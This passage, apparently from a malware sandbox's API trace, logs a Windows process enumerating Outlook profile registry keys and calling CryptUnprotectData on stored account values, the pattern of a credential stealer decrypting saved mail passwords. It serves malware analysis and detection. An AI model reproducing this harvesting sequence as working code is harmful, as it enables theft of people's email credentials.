CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e620*=0x80) returned 0x0 [0169.197] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\179M615Q\\179logrc.ini", NtPathName=0x14de98, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\179M615Q\\179logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.197] NtCreateFile (in: FileHandle=0x14deb8, DesiredAccess=0x120089, ObjectAttributes=0x14de80*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\179M615Q\\179logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14dea0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14deb8*=0x0, IoStatusBlock=0x14dea0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0169.200] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x76da30) returned 1 [0169.202] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x14db70, Length=0x200, ResultLength=0x14dfb8 | out: KeyInformation=0x14db70, ResultLength=0x14dfb8) returned 0x0 [0169.202] NtCreateKey (in: KeyHandle=0x14dfc4, DesiredAccess=0x20219, ObjectAttributes=0x14d328*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14dfc4*=0xf4) returned 0x0 [0169.202] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x14d770, Length=0x400, ResultLength=0x14dfcc | out: KeyInformation=0x14d770, ResultLength=0x14dfcc) returned 0x8000001a [0169.202] NtClose (Handle=0xf4) returned 0x0 [0169.202] NtEnumerateKey (in: KeyHandle=0x80, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x14db70, Length=0x200, ResultLength=0x14dfb8 | out: KeyInformation=0x14db70, ResultLength=0x14dfb8) returned 0x0 [0169.202] NtCreateKey (in: KeyHandle=0x14dfc4, DesiredAccess=0x20219, ObjectAttributes=0x14d328*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14dfc4*=0xf4) returned 0x0 [0169.203] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x14d770, Length=0x400, ResultLength=0x14dfcc | out: KeyInformation=0x14d770, ResultLength=0x14dfcc) returned 0x8000001a [0169.203] NtClose (Handle=0xf4) returned 0x0 [0169.203] NtEnumerateKey (in: KeyHandle=0x80, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x14db70, Length=0x200, ResultLength=0x14dfb8 | out: KeyInformation=0x14db70, ResultLength=0x14dfb8) returned 0x0 [0169.203] NtCreateKey (in: KeyHandle=0x14dfc4, DesiredAccess=0x20219, ObjectAttributes=0x14d328*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\22165c4f0be62c48b2e3e9aef6ce3db3", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14dfc4*=0xf4) returned 0x0 [0169.203] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x14d770, Length=0x400, ResultLength=0x14dfcc | out: KeyInformation=0x14d770, ResultLength=0x14dfcc) returned 0x8000001a [0169.203] NtClose (Handle=0xf4) returned 0x0 [0169.203] NtEnumerateKey (in: KeyHandle=0x80, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x14db70, Length=0x200, ResultLength=0x14dfb8 | out: KeyInformation=0x14db70, ResultLength=0x14dfb8) returned 0x0 [0169.203] NtCreateKey (in: KeyHandle=0x14dfc4, DesiredAccess=0x20219, ObjectAttributes=0x14d328*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14dfc4*=0xf4) returned 0x0 [0169.203] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x14d770, Length=0x400, ResultLength=0x14dfcc | out: KeyInformation=0x14d770, ResultLength=0x14dfcc) returned 0x8000001a [0169.203] NtClose (Handle=0xf4) returned 0x0 [0169.203] NtEnumerateKey (in: KeyHandle=0x80, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x14db70, Length=0x200, ResultLength=0x14dfb8 | out: KeyInformation=0x14db70, ResultLength=0x14dfb8) returned 0x0 [0169.203] NtCreateKey (in: KeyHandle=0x14dfc4, DesiredAccess=0x20219, ObjectAttributes=0x14d328*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\4b31ac339b3c6047a5607d10314f5a05", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14dfc4*=0xf4) returned 0x0 [0169.203] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x14d770, Length=0x400, ResultLength=0x14dfcc | out: KeyInformation=0x14d770, ResultLength=0x14dfcc) returned 0x8000001a [0169.203] NtClose (Handle=0xf4) returned 0x0 [0169.203] NtEnumerateKey (in: KeyHandle=0x80, Index=0x5, KeyInformationClass=0x0, KeyInformation=0x14db70, Length=0x200, ResultLength=0x14dfb8 | out: KeyInformation=0x14db70, ResultLength=0x14dfb8) returned 0x0 [0169.203] NtCreateKey (in: KeyHandle=0x14dfc4, DesiredAccess=0x20219, ObjectAttributes=0x14d328*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\81fb1dc666658c4bb96e792ef5ce3051", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14dfc4*=0xf4) returned 0x0 [0169.204] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x14d770, Length=0x400, ResultLength=0x14dfcc | out: KeyInformation=0x14d770, ResultLength=0x14dfcc) returned 0x8000001a [0169.204] NtClose (Handle=0xf4) returned 0x0 [0169.204] NtEnumerateKey (in: KeyHandle=0x80, Index=0x6, KeyInformationClass=0x0, KeyInformation=0x14db70, Length=0x200, ResultLength=0x14dfb8 | out: KeyInformation=0x14db70, ResultLength=0x14dfb8) returned 0x0 [0169.204] NtCreateKey (in: KeyHandle=0x14dfc4, DesiredAccess=0x20219, ObjectAttributes=0x14d328*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14dfc4*=0xf4) returned 0x0 [0169.204] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x14d770, Length=0x400, ResultLength=0x14dfcc | out: KeyInformation=0x14d770, ResultLength=0x14dfcc) returned 0x8000001a [0169.204] NtClose (Handle=0xf4) returned 0x0 [0169.204] NtEnumerateKey (in: KeyHandle=0x80, Index=0x7, KeyInformationClass=0x0, KeyInformation=0x14db70, Length=0x200, ResultLength=0x14dfb8 | out: KeyInformation=0x14db70, ResultLength=0x14dfb8) returned 0x0 [0169.204] NtCreateKey (in: KeyHandle=0x14dfc4, DesiredAccess=0x20219, ObjectAttributes=0x14d328*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14dfc4*=0xf4) returned 0x0 [0169.204] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x14d770, Length=0x400, ResultLength=0x14dfcc | out: KeyInformation=0x14d770, ResultLength=0x14dfcc) returned 0x8000001a [0169.204] NtClose (Handle=0xf4) returned 0x0 [0169.204] NtEnumerateKey (in: KeyHandle=0x80, Index=0x8, KeyInformationClass=0x0, KeyInformation=0x14db70, Length=0x200, ResultLength=0x14dfb8 | out: KeyInformation=0x14db70, ResultLength=0x14dfb8) returned 0x0 [0169.204] NtCreateKey (in: KeyHandle=0x14dfc4, DesiredAccess=0x20219, ObjectAttributes=0x14d328*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14dfc4*=0xf4) returned 0x0 [0169.204] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x14d770, Length=0x400, ResultLength=0x14dfcc | out: KeyInformation=0x14d770, ResultLength=0x14dfcc) returned 0x0 [0169.204] NtCreateKey (in: KeyHandle=0x14dfc0, DesiredAccess=0x20219, ObjectAttributes=0x14d328*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14dfc0*=0xf8) returned 0x0 [0169.207] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.207] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.215] RtlIntegerToChar (in: Value=0x784af68b, Base=0x0, Length=0x20, String=0x14d2d8 | out: String="2018178699") returned 0x0 [0169.215] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.215] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.215] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.223] RtlIntegerToChar (in: Value=0x2, Base=0x0, Length=0x20, String=0x14d2d8 | out: String="2") returned 0x0 [0169.223] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.223] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.223] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x8000001a [0169.223] NtClose (Handle=0xf8) returned 0x0 [0169.223] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x14d770, Length=0x400, ResultLength=0x14dfcc | out: KeyInformation=0x14d770, ResultLength=0x14dfcc) returned 0x0 [0169.231] NtCreateKey (in: KeyHandle=0x14dfc0, DesiredAccess=0x20219, ObjectAttributes=0x14d328*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14dfc0*=0xf8) returned 0x0 [0169.466] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.466] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.476] RtlIntegerToChar (in: Value=0xda8bfb39, Base=0x0, Length=0x20, String=0x14d2d8 | out: String="3666606905") returned 0x0 [0169.476] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.476] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.476] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.476] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.476] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.476] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.476] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x8, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.486] RtlIntegerToChar (in: Value=0x0, Base=0x0, Length=0x20, String=0x14d2d8 | out: String="0") returned 0x0 [0169.486] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x9, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.495] RtlIntegerToChar (in: Value=0xe0003, Base=0x0, Length=0x20, String=0x14d2d8 | out: String="917507") returned 0x0 [0169.495] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0xa, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.496] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0xb, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.496] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0xc, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.496] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0xd, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.498] CryptUnprotectData (in: pDataIn=0x14d2b0, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x1, pDataOut=0x14d2a8 | out: ppszDataDescr=0x0, pDataOut=0x14d2a8) returned 1 [0169.603] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x76b068) returned 1 [0169.603] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0xe, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x8000001a [0169.604] NtClose (Handle=0xf8) returned 0x0 [0169.604] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x14d770, Length=0x400, ResultLength=0x14dfcc | out: KeyInformation=0x14d770, ResultLength=0x14dfcc) returned 0x0 [0169.604] NtCreateKey (in: KeyHandle=0x14dfc0, DesiredAccess=0x20219, ObjectAttributes=0x14d328*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14dfc0*=0xf8) returned 0x0 [0169.604] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.604] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.612] RtlIntegerToChar (in: Value=0x43f3cd07, Base=0x0, Length=0x20, String=0x14d2d8 | out: String="1140051207") returned 0x0 [0169.612] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.612] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.612] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.620] RtlIntegerToChar (in: Value=0x4, Base=0x0, Length=0x20, String=0x14d2d8 | out: String="4") returned 0x0 [0169.620] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.620] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x0 [0169.620] NtEnumerateValueKey (in: KeyHandle=0xf8, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0x14d370, Length=0x400, ResultLength=0x14dfcc | out: KeyValueInformation=0x14d370, ResultLength=0x14dfcc) returned 0x8000001a [0169.620] NtClose (Handle=0xf8) returned 0x0 [0169.621] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x14d770, Length=0x400, ResultLength=0x14dfcc | out: KeyInformation=0x14d770, ResultLength=0x14dfcc) returned 0x8000001a [0169.621] NtClose (Handle=0xf4) returned 0x0 [0169.621] NtEnumerateKey (in: KeyHandle=0x80, Index=0x9, KeyInformationClass=0x0, KeyInformation=0x14db70, Length=0x200, ResultLength=0x14dfb8 | out: KeyInformation=0x14db70, ResultLength=0x14dfb8) returned 0x0 [0169.621] NtCreateKey (in: KeyHandle=0x14dfc4, DesiredAccess=0x20219, ObjectAttributes=0x14d328*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\94ba7772fb349a48ba2cc741623a1549", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14dfc4*=0xf4) returned 0x0 [0169.621] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x14d770, Length=0x400, ResultLength=0x14dfcc | out: KeyInformation=0x14d770, ResultLength=0x14dfcc) returned 0x8000001a [0169.621] NtClose (Handle=0xf4) returned 0x0 [0169.621] NtEnumerateKey (in: KeyHandle=0x80, Index=0xa, KeyInformationClass=0x0, KeyInformation=0x14db70, Length=0x200, ResultLength=0x14dfb8 | out: KeyInformation=0x14db70, ResultLength=0x14dfb8) returned 0x0 [0169.621] NtCreateKey (in: KeyHandle=0x14dfc4, DesiredAccess=0x20219, ObjectAttributes=0x14d328*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\a44d88fba08a5547a1aaad50659b22d8", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14dfc4*=0xf4) returned 0x0 [0169.621] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x14d770, Length=0x400, ResultLength=0x14dfcc | out: KeyInformation=0x14d770, ResultLength=0x14dfcc) returned 0x8000001a [0169.621] NtClose (Handle=0xf4) returned 0x0 [0169.621] NtEnumerateKey (in: KeyHandle=0x80, Index=0xb, KeyInformationClass=0x0, KeyInformation=0x14db70, Length=0x200, ResultLength=0x14dfb8 | out: KeyInformation=0x14db70, ResultLength=0x14dfb8) returned 0x0 [0169.621] NtCreateKey (in: KeyHandle=0x14dfc4, DesiredAccess=0x20219, ObjectAttributes=0x14d328*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\ae0727370bd4364ea1d3e75390877e70", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14dfc4*=0xf4) returned 0x0 [0169.621] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x14d770, Length=0x400, ResultLength=0x14dfcc | out: KeyInformation=0x14d770, ResultLength=0x14dfcc) returned 0x8000001a [0169.621] NtClose (Handle=0xf4) returned 0x0 [0169.621] NtEnumerateKey (in: KeyHandle=0x80, Index=0xc, KeyInformationClass=0x0, KeyInformation=0x14db70, Length=0x200, ResultLength=0x14dfb8 | out: KeyInformation=0x14db70, ResultLength=0x14dfb8) returned 0x0 [0169.622] NtCreateKey (in: KeyHandle=0x14dfc4, DesiredAccess=0x20219, ObjectAttributes=0x14d328*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c1b3326b5fa84f45970fa09da288db37", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14dfc4*=0xf4) returned 0x0 [0169.622] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x14d770, Length=0x400, ResultLength=0x14dfcc | out: KeyInformation=0x14d770, ResultLength=0x14dfcc) returned 0x8000001a [0169.622] NtClose (Handle=0xf4) returned 0x0 [0169.622] NtEnumerateKey (in: KeyHandle=0x80, Index=0xd, KeyInformationClass=0x0, KeyInformation=0x14db70, Length=0x200, ResultLength=0x14dfb8 | out: KeyInformation=0x14db70, ResultLength=0x14dfb8) returned 0x0 [0169.622] NtCreateKey (in: KeyHandle=0x14dfc4, DesiredAccess=0x20219, ObjectAttributes=0x14d328*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14dfc4*=0xf4) returned 0x0 [0169.622] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x14d770, Length=0x400, ResultLength=0x14dfcc | out: KeyInformation=0x14d770, ResultLength=0x14dfcc) returned 0x8000001a [0169.622] NtClose (Handle=0xf4) returned 0x0 [0169.622] NtEnumerateKey (in: KeyHandle=0x80, Index=0xe, KeyInformationClass=0x0, KeyInformation=0x14db70, Length=0x200, ResultLength=0x14dfb8 | out: KeyInformation=0x14db70, ResultLength=0x14dfb8) returned 0x8000001a [0169.622] NtCreateKey (in: KeyHandle=0x14e620, DesiredAccess=0x20219, ObjectAttributes=0x14dfb0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook_2016\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e620*=0xf4) returned 0x0 [0169.623] NtEnumerateKey (in: KeyHandle=0xf4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x14db70, Length=0x200, ResultLength=0x14dfb8 | out: KeyInformation=0x14db70, ResultLength=0x14dfb8) returned 0x8000001a [0169.623] NtOpenProcessToken (in: 